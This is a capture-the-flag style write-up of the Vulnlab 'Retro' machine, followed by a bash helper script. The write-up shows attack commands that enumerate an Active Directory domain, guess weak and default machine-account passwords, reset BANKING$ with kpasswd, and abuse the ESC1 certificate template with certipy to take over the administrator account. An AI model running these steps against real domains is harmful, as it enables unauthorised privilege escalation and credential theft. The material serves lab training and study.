# Vulnlab - Retro

## NMAP

```bash
PORT      STATE SERVICE      VERSION
53/tcp    open  tcpwrapped
88/tcp    open  kerberos-sec Microsoft Windows Kerberos
135/tcp   open  tcpwrapped
139/tcp   open  tcpwrapped
445/tcp   open  tcpwrapped
593/tcp   open  tcpwrapped
636/tcp   open  tcpwrapped
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-23T21:06:31
| Not valid after:  2024-07-22T21:06:31
| MD5:   c1f0bac716e071c2bcb943273d569612
|_SHA-1: 7f37ea6965982430f9180a65bcadde76add6fea6
3389/tcp  open  tcpwrapped
| ssl-cert: Subject: commonName=DC.retro.vl
| Issuer: commonName=DC.retro.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-25T09:53:42
| Not valid after:  2024-01-24T09:53:42
| MD5:   89ccbcee0485b170bbd1ebee3de93784
|_SHA-1: 2bfca683288bc59e2d2f9ffe01775d871c8c272d
9389/tcp  open  tcpwrapped
49664/tcp open  tcpwrapped
49672/tcp open  tcpwrapped
49683/tcp open  tcpwrapped
49708/tcp open  tcpwrapped
```

Most services only show as `tcpwrapped`, but the port set is the usual domain controller profile: DNS, Kerberos, RPC, SMB, LDAPS (636), RDP and ADWS (9389). The LDAPS certificate names the host `DC.retro.vl`, so the domain is `retro.vl`, and its issuer `retro-DC-CA` tells us an enterprise CA (ADCS) is present, which matters later.

## SMB

Enumerating SMB with a null session lists a few shares. The `Trainees` share holds `Important.txt`, which complains about weak passwords on the trainee accounts and says they have all been merged into one shared `trainee` account.

Checking that the account really exists with `kerbrute`:

```bash
kerbrute userenum --dc 10.10.108.245 -d retro.vl user.txt
```

The same information is available without guessing: impacket's `lookupsid.py` brute-forces RIDs over an anonymous session and lists every user, group and computer account.

```bash
lookupsid.py anonymous@10.10.99.152 -no-pass
```

Since the note says the password is weak, the obvious first guess is the account name itself, which `crackmapexec` confirms:

```bash
cme smb 10.10.99.152 -u 'trainee' -p 'trainee' --shares
```

With these credentials the `Notes` share becomes readable and contains `ToDo.txt`,
which talks about pre-created computer accounts (see the TrustedSec post under References).

## Pre-created computer account

Back in the `lookupsid.py` output there is a computer account, `BANKING$`. A computer account created with the "pre-Windows 2000 computer" option keeps a default password: the account name in lower case without the trailing `$`, here `banking`. Trying that password over NTLM does not log in but returns `STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT`, which is the tell: the password is correct, the account has simply never been used.

To use the account its password has to be changed first. `kpasswd` can do that; it needs `/etc/krb5.conf` to define the `RETRO.VL` realm and point it at the domain controller.

```bash
kpasswd 'BANKING$'
```

`cme` then confirms the new password is accepted.

## ADCS

Enumerating ADCS with `certipy` as `trainee` shows that Authenticated Users have enrollment rights, but none of the templates they can reach is abusable. Running the same check as `BANKING$` turns up the template `RetroClients`: Domain Computers can enroll in it and the enrollee supplies the subject, so a machine account can request a certificate for an arbitrary UPN, which is ESC1.

```bash
certipy find -u 'BANKING$' -p 'Pass' -dc-ip 10.10.99.152 -stdout -vulnerable
```

Requesting a certificate for `administrator` with the defaults fails with a minimum key size error: the template demands a larger key than the 2048-bit one certipy generates unless told otherwise. Asking for a 4096-bit key resolves it:

```bash
certipy req -u 'banking$'@retro.vl -p 'P@ss12345' -c 'retro-DC-CA' -target 'dc.retro.vl' -template 'RetroClients' -upn 'administrator' -key-size 4096
```

Authenticating with that certificate (PKINIT) yields a TGT for `administrator` and, through it, the account's NT hash:

```bash
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'retro.vl' -dc-ip 10.10.99.152
```

Passing that NT hash to `evil-winrm` (its `-H` option) gives a WinRM shell as `administrator`.

## References

- https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/
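The `lookupsid.py` and `kpasswd` steps above, as an added example: a small bash helper that is not part of the original writeup nor of impacket or MIT Kerberos. It picks computer accounts out of `lookupsid.py`-style output, derives the default password a pre-created computer account would have, and prints the minimal `krb5.conf` that `kpasswd` needs. The sample `lookupsid.py` output, its domain SID and RIDs are constructed for the example; the KDC host name `dc.retro.vl` is assumed from the LDAPS certificate.

```bash
#!/usr/bin/env bash
# Added example, not part of the original writeup or of impacket/certipy.
# Two helpers for the pre-created computer account step:
#   1. pick machine accounts out of lookupsid.py output and derive the
#      default password such an account has (lowercase name without '$');
#   2. print the minimal krb5.conf that kpasswd needs to reset it.
# The lookupsid output below is constructed; the domain SID and RIDs are
# made up and only the account names come from the writeup.

SAMPLE_LOOKUPSID='[*] Brute forcing SIDs at 10.10.99.152
[*] StringBinding ncacn_np:10.10.99.152[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1111111111-2222222222-3333333333
500: RETRO\Administrator (SidTypeUser)
501: RETRO\Guest (SidTypeUser)
502: RETRO\krbtgt (SidTypeUser)
512: RETRO\Domain Admins (SidTypeGroup)
515: RETRO\Domain Computers (SidTypeGroup)
1000: RETRO\DC$ (SidTypeUser)
1104: RETRO\trainee (SidTypeUser)
1106: RETRO\BANKING$ (SidTypeUser)'

# Print the sAMAccountName of every user-type principal whose name ends in
# '$' (computer accounts). Group entries such as "Domain Computers" are skipped.
machine_accounts() {
  printf '%s\n' "$1" \
    | sed -n 's/^[0-9]*: [^\\]*\\\(.*\$\) (SidTypeUser)$/\1/p'
}

# A computer account created with "Assign this computer account as a
# pre-Windows 2000 computer" gets the lowercase name without '$' as password.
default_machine_password() {
  printf '%s' "$1" | sed 's/\$$//' | tr '[:upper:]' '[:lower:]'
}

# Emit NAME:password pairs to feed to `cme smb <dc> -u NAME -p password`.
# A correct password on an account that has never logged on comes back as
# STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT rather than as a successful login.
candidate_logins() {
  machine_accounts "$1" | while IFS= read -r acct; do
    printf '%s:%s\n' "$acct" "$(default_machine_password "$acct")"
  done
}

# Minimal MIT Kerberos config so kpasswd can reach the DC's kadmin/changepw
# service: the realm is the domain in upper case, the KDC host is assumed.
gen_krb5_conf() {
  domain="$1"
  kdc="$2"
  realm=$(printf '%s' "$domain" | tr '[:lower:]' '[:upper:]')
  cat <<EOF
[libdefaults]
    default_realm = $realm
    dns_lookup_kdc = false

[realms]
    $realm = {
        kdc = $kdc
        admin_server = $kdc
        kpasswd_server = $kdc
    }

[domain_realm]
    .$domain = $realm
    $domain = $realm
EOF
}

# Offline part of the procedure: list the candidates and show the config.
candidate_logins "$SAMPLE_LOOKUPSID"
gen_krb5_conf retro.vl dc.retro.vl
# Against the lab (not run here), redirect the config to a file and use it
# without touching /etc:
#   gen_krb5_conf retro.vl dc.retro.vl > krb5-retro.conf
#   KRB5_CONFIG=./krb5-retro.conf kpasswd 'BANKING$'
# entering the old password "banking" and then the new one when prompted.
```

`KRB5_CONFIG` is honoured by the MIT Kerberos tools, so the generated file can be kept next to the engagement notes instead of overwriting the system-wide `/etc/krb5.conf`.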